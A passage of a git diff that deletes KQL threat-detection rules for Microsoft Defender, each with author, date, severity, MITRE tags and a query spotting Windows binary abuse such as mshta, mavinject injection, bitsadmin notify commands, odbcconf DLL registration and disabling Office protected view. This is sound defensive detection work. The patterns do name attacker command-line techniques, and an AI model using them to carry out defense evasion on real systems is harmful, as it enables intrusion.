@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/12/29
-// Level: medium
-// Description: Detect usage of the "ssh.exe" binary as a proxy to launch other programs
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\OpenSSH\\sshd.exe" or ((ProcessCommandLine contains "ProxyCommand=" or (ProcessCommandLine contains "PermitLocalCommand" and ProcessCommandLine contains "LocalCommand")) and FolderPath endswith "\\ssh.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Lolbin_Unregmp2.exe_Use_As_Proxy.kql b/Defense Evasion/Lolbin_Unregmp2.exe_Use_As_Proxy.kql
deleted file mode 100644
index 2dc54c90..00000000
--- a/Defense Evasion/Lolbin_Unregmp2.exe_Use_As_Proxy.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/29
-// Level: medium
-// Description: Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe"
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains " /HideWMP" and (FolderPath endswith "\\unregmp2.exe" or ProcessVersionInfoOriginalFileName =~ "unregmp2.exe")
\ No newline at end of file
diff --git a/Defense Evasion/MSHTA_Suspicious_Execution_01.kql b/Defense Evasion/MSHTA_Suspicious_Execution_01.kql
deleted file mode 100644
index 280ba986..00000000
--- a/Defense Evasion/MSHTA_Suspicious_Execution_01.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)
-// Date: 2019/02/22
-// Level: high
-// Description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism
-// Tags: attack.defense_evasion, attack.t1140, attack.t1218.005, attack.execution, attack.t1059.007, cve.2020.1599
-DeviceProcessEvents
-| where (ProcessCommandLine contains "vbscript" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".lnk" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".zip" or ProcessCommandLine contains ".dll") and FolderPath endswith "\\mshta.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Macro_Enabled_In_A_Potentially_Suspicious_Document.kql b/Defense Evasion/Macro_Enabled_In_A_Potentially_Suspicious_Document.kql
deleted file mode 100644
index b3590a9b..00000000
--- a/Defense Evasion/Macro_Enabled_In_A_Potentially_Suspicious_Document.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/21
-// Level: high
-// Description: Detects registry changes to Office trust records where the path is located in a potentially suspicious location
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryKey contains "/AppData/Local/Microsoft/Windows/INetCache/" or RegistryKey contains "/AppData/Local/Temp/" or RegistryKey contains "/PerfLogs/" or RegistryKey contains "C:/Users/Public/" or RegistryKey contains "file:///D:/" or RegistryKey contains "file:///E:/") and RegistryKey contains "\\Security\\Trusted Documents\\TrustRecords"
\ No newline at end of file
diff --git a/Defense Evasion/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql b/Defense Evasion/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql
deleted file mode 100644
index a55dc381..00000000
--- a/Defense Evasion/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/08/12
-// Level: high
-// Description: Detects creation of a malicious DLL file in the location where the OneDrive or Team applications
-Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.002
-DeviceFileEvents
-| where FolderPath contains "iphlpapi.dll" and FolderPath contains "\\AppData\\Local\\Microsoft"
\ No newline at end of file
diff --git a/Defense Evasion/Malicious_PE_Execution_by_Microsoft_Visual_Studio_Debugger.kql b/Defense Evasion/Malicious_PE_Execution_by_Microsoft_Visual_Studio_Debugger.kql
deleted file mode 100644
index 96432dcf..00000000
--- a/Defense Evasion/Malicious_PE_Execution_by_Microsoft_Visual_Studio_Debugger.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community
-// Date: 2020/10/14
-// Level: medium
-// Description: There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger.
-This option may be used adversaries to execute malicious code by signed verified binary.
-The debugger is installed alongside with Microsoft Visual Studio package.
-
-// Tags: attack.t1218, attack.defense_evasion
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\vsjitdebugger.exe" and (not(((FolderPath contains "\\vsimmersiveactivatehelper" and FolderPath contains ".exe") or FolderPath endswith "\\devenv.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Malicious_Windows_Script_Components_File_Execution_by_TAEF_Detection.kql b/Defense Evasion/Malicious_Windows_Script_Components_File_Execution_by_TAEF_Detection.kql
deleted file mode 100644
index a7baffeb..00000000
--- a/Defense Evasion/Malicious_Windows_Script_Components_File_Execution_by_TAEF_Detection.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Agro (@agro_sev) oscd.community
-// Date: 2020/10/13
-// Level: low
-// Description: Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces
-Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where FolderPath endswith "\\te.exe" or InitiatingProcessFolderPath endswith "\\te.exe" or ProcessVersionInfoOriginalFileName =~ "\\te.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Mavinject_Inject_DLL_Into_Running_Process.kql b/Defense Evasion/Mavinject_Inject_DLL_Into_Running_Process.kql
deleted file mode 100644
index 2be19bac..00000000
--- a/Defense Evasion/Mavinject_Inject_DLL_Into_Running_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Florian Roth
-// Date: 2021/07/12
-// Level: high
-// Description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055.001, attack.t1218.013
-DeviceProcessEvents
-| where ProcessCommandLine contains " /INJECTRUNNING " and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\AppVClient.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/MaxMpxCt_Registry_Value_Changed.kql b/Defense Evasion/MaxMpxCt_Registry_Value_Changed.kql
deleted file mode 100644
index 894acf23..00000000
--- a/Defense Evasion/MaxMpxCt_Registry_Value_Changed.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/03/19
-// Level: low
-// Description: Detects changes to the "MaxMpxCt" registry value.
-MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate.
-Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.
-
-// Tags: attack.defense_evasion, attack.t1070.005
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Services\\LanmanServer\\Parameters\\MaxMpxCt"
\ No newline at end of file
diff --git a/Defense Evasion/Microsoft_Office_DLL_Sideload.kql b/Defense Evasion/Microsoft_Office_DLL_Sideload.kql
deleted file mode 100644
index 7003f77d..00000000
--- a/Defense Evasion/Microsoft_Office_DLL_Sideload.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: high
-// Description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\outllib.dll" and (not((FolderPath startswith "C:\\Program Files\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\Root\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE")))
\ No newline at end of file
diff --git a/Defense Evasion/Microsoft_Office_Protected_View_Disabled.kql b/Defense Evasion/Microsoft_Office_Protected_View_Disabled.kql
deleted file mode 100644
index f541d3c2..00000000
--- a/Defense Evasion/Microsoft_Office_Protected_View_Disabled.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/06/08
-// Level: high
-// Description: Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Office" and RegistryKey contains "\\Security\\ProtectedView") and ((RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\enabledatabasefileprotectedview" or RegistryKey endswith "\\enableforeigntextfileprotectedview")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\DisableAttachementsInPV" or RegistryKey endswith "\\DisableInternetFilesInPV" or RegistryKey endswith "\\DisableIntranetCheck" or RegistryKey endswith "\\DisableUnsafeLocationsInPV")))
\ No newline at end of file
diff --git a/Defense Evasion/Microsoft_Sync_Center_Suspicious_Network_Connections.kql b/Defense Evasion/Microsoft_Sync_Center_Suspicious_Network_Connections.kql
deleted file mode 100644
index 49fbaa43..00000000
--- a/Defense Evasion/Microsoft_Sync_Center_Suspicious_Network_Connections.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: elhoim
-// Date: 2022/04/28
-// Level: medium
-// Description: Detects suspicious connections from Microsoft Sync Center to non-private IPs.
-// Tags: attack.t1055, attack.t1218, attack.execution, attack.defense_evasion
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/Defense Evasion/Microsoft_Workflow_Compiler_Execution.kql b/Defense Evasion/Microsoft_Workflow_Compiler_Execution.kql
deleted file mode 100644
index fc3958d8..00000000
--- a/Defense Evasion/Microsoft_Workflow_Compiler_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nik Seetharaman, frack113
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
-// Tags: attack.defense_evasion, attack.execution, attack.t1127, attack.t1218
-DeviceProcessEvents
-| where FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or ProcessVersionInfoOriginalFileName =~ "Microsoft.Workflow.Compiler.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Modification_of_IE_Registry_Settings.kql b/Defense Evasion/Modification_of_IE_Registry_Settings.kql
deleted file mode 100644
index b0b1e710..00000000
--- a/Defense Evasion/Modification_of_IE_Registry_Settings.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/22
-// Level: low
-// Description: Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" and (not((RegistryKey contains "\\Accepted Documents" or RegistryValueData =~ "Binary Data" or RegistryValueData startswith "DWORD" or (RegistryValueData in~ ("Cookie:", "Visited:", "(Empty)")) or (RegistryKey contains "\\Cache" or RegistryKey contains "\\ZoneMap" or RegistryKey contains "\\WpadDecision"))))
\ No newline at end of file
diff --git a/Defense Evasion/Modify_Group_Policy_Settings.kql b/Defense Evasion/Modify_Group_Policy_Settings.kql
deleted file mode 100644
index 45d1feba..00000000
--- a/Defense Evasion/Modify_Group_Policy_Settings.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/19
-// Level: medium
-// Description: Detect malicious GPO modifications can be used to implement many other malicious behaviors.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1484.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "GroupPolicyRefreshTimeDC" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffsetDC" or ProcessCommandLine contains "GroupPolicyRefreshTime" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffset" or ProcessCommandLine contains "EnableSmartScreen" or ProcessCommandLine contains "ShellSmartScreenLevel") and ProcessCommandLine contains "\\SOFTWARE\\Policies\\Microsoft\\Windows\\System" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Monitoring_For_Persistence_Via_BITS.kql b/Defense Evasion/Monitoring_For_Persistence_Via_BITS.kql
deleted file mode 100644
index 0c15a4a8..00000000
--- a/Defense Evasion/Monitoring_For_Persistence_Via_BITS.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: Sreeman
-// Date: 2020/10/29
-// Level: medium
-// Description: BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished.
-When the job runs on the system the command specified in the BITS job will be executed.
-This can be abused by actors to create a backdoor within the system and for persistence.
-It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded.
-
-// Tags: attack.defense_evasion, attack.t1197
-DeviceProcessEvents
-| where (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") and ((ProcessCommandLine contains "/SetNotifyCmdLine" and (ProcessCommandLine contains "%COMSPEC%" or ProcessCommandLine contains "cmd.exe" or ProcessCommandLine contains "regsvr32.exe")) or (ProcessCommandLine contains "/Addfile" and (ProcessCommandLine contains "http:" or ProcessCommandLine contains "https:" or ProcessCommandLine contains "ftp:" or ProcessCommandLine contains "ftps:")))
\ No newline at end of file
diff --git a/Defense Evasion/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql b/Defense Evasion/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql
deleted file mode 100644
index 3f152c7d..00000000
--- a/Defense Evasion/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA)
-// Date: 2022/08/14
-// Level: high
-// Description: Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)
-
-// Tags: attack.defense_evasion, attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains "#135" or ProcessCommandLine contains "RunHTMLApplication") and (ProcessCommandLine contains "\\..\\" and ProcessCommandLine contains "mshtml")
\ No newline at end of file
diff --git a/Defense Evasion/MsiExec_Web_Install.kql b/Defense Evasion/MsiExec_Web_Install.kql
deleted file mode 100644
index 15d8a634..00000000
--- a/Defense Evasion/MsiExec_Web_Install.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/02/09
-// Level: medium
-// Description: Detects suspicious msiexec process starts with web addresses as parameter
-// Tags: attack.defense_evasion, attack.t1218.007, attack.command_and_control, attack.t1105
-DeviceProcessEvents
-| where ProcessCommandLine contains " msiexec" and ProcessCommandLine contains "://"
\ No newline at end of file
diff --git a/Defense Evasion/Msiexec_Quiet_Installation.kql b/Defense Evasion/Msiexec_Quiet_Installation.kql
deleted file mode 100644
index e47c0886..00000000
--- a/Defense Evasion/Msiexec_Quiet_Installation.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/01/16
-// Level: medium
-// Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
-Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
-
-// Tags: attack.defense_evasion, attack.t1218.007
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-i" or ProcessCommandLine contains "/i" or ProcessCommandLine contains "-package" or ProcessCommandLine contains "/package" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "-j" or ProcessCommandLine contains "/j") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "msiexec.exe") and (ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q")) and (not(((ProcessIntegrityLevel =~ "System" and InitiatingProcessFolderPath =~ "C:\\Windows\\CCM\\Ccm32BitLauncher.exe") or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Msxsl.EXE_Execution.kql b/Defense Evasion/Msxsl.EXE_Execution.kql
deleted file mode 100644
index 5adad169..00000000
--- a/Defense Evasion/Msxsl.EXE_Execution.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2019/10/21
-// Level: medium
-// Description: Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files.
-Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
-
-// Tags: attack.defense_evasion, attack.t1220
-DeviceProcessEvents
-| where FolderPath endswith "\\msxsl.exe"
\ No newline at end of file
diff --git a/Defense Evasion/NET_NGenAssemblyUsageLog_Registry_Key_Tamper.kql b/Defense Evasion/NET_NGenAssemblyUsageLog_Registry_Key_Tamper.kql
deleted file mode 100644
index fd8baf44..00000000
--- a/Defense Evasion/NET_NGenAssemblyUsageLog_Registry_Key_Tamper.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2022/11/18
-// Level: high
-// Description: Detects changes to the NGenAssemblyUsageLog registry key.
-.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).
-By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.
-
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey endswith "SOFTWARE\\Microsoft\\.NETFramework\\NGenAssemblyUsageLog"
\ No newline at end of file
diff --git a/Defense Evasion/NetNTLM_Downgrade_Attack_-_Registry.kql b/Defense Evasion/NetNTLM_Downgrade_Attack_-_Registry.kql
deleted file mode 100644
index 016f8720..00000000
--- a/Defense Evasion/NetNTLM_Downgrade_Attack_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), wagga
-// Date: 2018/03/20
-// Level: high
-// Description: Detects NetNTLM downgrade attack
-// Tags: attack.defense_evasion, attack.t1562.001, attack.t1112
-DeviceRegistryEvents
-| where (RegistryKey contains "SYSTEM" and RegistryKey contains "ControlSet" and RegistryKey contains "\\Control\\Lsa") and (RegistryKey endswith "\\lmcompatibilitylevel" or RegistryKey endswith "\\NtlmMinClientSec" or RegistryKey endswith "\\RestrictSendingNTLMTraffic")
\ No newline at end of file
diff --git a/Defense Evasion/Netsh_Allow_Group_Policy_on_Microsoft_Defender_Firewall.kql b/Defense Evasion/Netsh_Allow_Group_Policy_on_Microsoft_Defender_Firewall.kql
deleted file mode 100644
index fa2fb1a9..00000000
--- a/Defense Evasion/Netsh_Allow_Group_Policy_on_Microsoft_Defender_Firewall.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/09
-// Level: medium
-// Description: Adversaries may modify system firewalls in order to bypass controls limiting network usage
-// Tags: attack.defense_evasion, attack.t1562.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "firewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "rule" and ProcessCommandLine contains "group=" and ProcessCommandLine contains "new" and ProcessCommandLine contains "enable=Yes") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Network_Connection_Initiated_By_AddinUtil.EXE.kql b/Defense Evasion/Network_Connection_Initiated_By_AddinUtil.EXE.kql
deleted file mode 100644
index 36f8079b..00000000
--- a/Defense Evasion/Network_Connection_Initiated_By_AddinUtil.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
-// Date: 2023/09/18
-// Level: medium
-// Description: Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe".
-This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\addinutil.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Network_Connection_Initiated_By_Regsvr32.EXE.kql b/Defense Evasion/Network_Connection_Initiated_By_Regsvr32.EXE.kql
deleted file mode 100644
index fece3237..00000000
--- a/Defense Evasion/Network_Connection_Initiated_By_Regsvr32.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Dmitriy Lifanov, oscd.community
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects a network connection initiated by "Regsvr32.exe"
-// Tags: attack.execution, attack.t1559.001, attack.defense_evasion, attack.t1218.010
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\regsvr32.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Network_Connection_Initiated_Via_Notepad.EXE.kql b/Defense Evasion/Network_Connection_Initiated_Via_Notepad.EXE.kql
deleted file mode 100644
index 8e765072..00000000
--- a/Defense Evasion/Network_Connection_Initiated_Via_Notepad.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: EagleEye Team
-// Date: 2020/05/14
-// Level: high
-// Description: Detects a network connection that is initiated by the "notepad.exe" process.
-This might be a sign of process injection from a beacon process or something similar.
-Notepad rarely initiates a network communication except when printing documents for example.
-
-// Tags: attack.command_and_control, attack.execution, attack.defense_evasion, attack.t1055
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\notepad.exe" and (not(RemotePort == 9100))
\ No newline at end of file
diff --git a/Defense Evasion/New_BgInfo.EXE_Custom_DB_Path_Registry_Configuration.kql b/Defense Evasion/New_BgInfo.EXE_Custom_DB_Path_Registry_Configuration.kql
deleted file mode 100644
index 1b6b673e..00000000
--- a/Defense Evasion/New_BgInfo.EXE_Custom_DB_Path_Registry_Configuration.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/16
-// Level: medium
-// Description: Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where ActionType =~ "RegistryValueSet" and RegistryKey endswith "\\Software\\Winternals\\BGInfo\\Database"
\ No newline at end of file
diff --git a/Defense Evasion/New_BgInfo.EXE_Custom_VBScript_Registry_Configuration.kql b/Defense Evasion/New_BgInfo.EXE_Custom_VBScript_Registry_Configuration.kql
deleted file mode 100644
index ec618a77..00000000
--- a/Defense Evasion/New_BgInfo.EXE_Custom_VBScript_Registry_Configuration.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/16
-// Level: medium
-// Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe"
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData startswith "4" and ActionType =~ "RegistryValueSet" and RegistryKey contains "\\Software\\Winternals\\BGInfo\\UserFields"
\ No newline at end of file
diff --git a/Defense Evasion/New_BgInfo.EXE_Custom_WMI_Query_Registry_Configuration.kql b/Defense Evasion/New_BgInfo.EXE_Custom_WMI_Query_Registry_Configuration.kql
deleted file mode 100644
index 24312dbc..00000000
--- a/Defense Evasion/New_BgInfo.EXE_Custom_WMI_Query_Registry_Configuration.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/16
-// Level: medium
-// Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe"
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData startswith "6" and ActionType =~ "RegistryValueSet" and RegistryKey contains "\\Software\\Winternals\\BGInfo\\UserFields"
\ No newline at end of file
diff --git a/Defense Evasion/New_DLL_Registered_Via_Odbcconf.EXE.kql b/Defense Evasion/New_DLL_Registered_Via_Odbcconf.EXE.kql
deleted file mode 100644
index bc970aa2..00000000
--- a/Defense Evasion/New_DLL_Registered_Via_Odbcconf.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/22
-// Level: medium
-// Description: Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.
-// Tags: attack.defense_evasion, attack.t1218.008
-DeviceProcessEvents
-| where (ProcessCommandLine contains "REGSVR " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")
\ No newline at end of file
diff --git a/Defense Evasion/New_DNS_ServerLevelPluginDll_Installed.kql b/Defense Evasion/New_DNS_ServerLevelPluginDll_Installed.kql
deleted file mode 100644
index 1fa50c1c..00000000
--- a/Defense Evasion/New_DNS_ServerLevelPluginDll_Installed.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/05/08
-// Level: high
-// Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
-// Tags: attack.defense_evasion, attack.t1574.002, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey endswith "\\services\\DNS\\Parameters\\ServerLevelPluginDll"
\ No newline at end of file
diff --git a/Defense Evasion/New_DNS_ServerLevelPluginDll_Installed_Via_Dnscmd.EXE.kql b/Defense Evasion/New_DNS_ServerLevelPluginDll_Installed_Via_Dnscmd.EXE.kql
deleted file mode 100644
index 13f2830a..00000000
--- a/Defense Evasion/New_DNS_ServerLevelPluginDll_Installed_Via_Dnscmd.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/05/08
-// Level: high
-// Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
-// Tags: attack.defense_evasion, attack.t1574.002, attack.t1112
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/config" and ProcessCommandLine contains "/serverlevelplugindll") and FolderPath endswith "\\dnscmd.exe"
\ No newline at end of file
diff --git a/Defense Evasion/New_File_Association_Using_Exefile.kql b/Defense Evasion/New_File_Association_Using_Exefile.kql
deleted file mode 100644
index 51ab4c8a..00000000
--- a/Defense Evasion/New_File_Association_Using_Exefile.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/11/19
-// Level: high
-// Description: Detects the abuse of the exefile handler in new file association. Used for bypass of security products.
-// Tags: attack.defense_evasion
-DeviceRegistryEvents
-| where RegistryValueData =~ "exefile" and RegistryKey contains "Classes\\."
\ No newline at end of file
diff --git a/Defense Evasion/New_Firewall_Rule_Added_Via_Netsh.EXE.kql b/Defense Evasion/New_Firewall_Rule_Added_Via_Netsh.EXE.kql
deleted file mode 100644
index 0e1275cd..00000000
--- a/Defense Evasion/New_Firewall_Rule_Added_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, Sander Wiebing
-// Date: 2019/01/29
-// Level: medium
-// Description: Detects the addition of a new rule to the Windows firewall via netsh
-// Tags: attack.defense_evasion, attack.t1562.004, attack.s0246
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " firewall " and ProcessCommandLine contains " add ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")) and (not(((ProcessCommandLine contains "advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=" and ProcessCommandLine contains ":\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe\" enable=yes profile=Any") or (ProcessCommandLine contains "advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=" and ProcessCommandLine contains ":\\Program Files\\Dropbox\\Client\\Dropbox.exe\" enable=yes profile=Any"))))
\ No newline at end of file
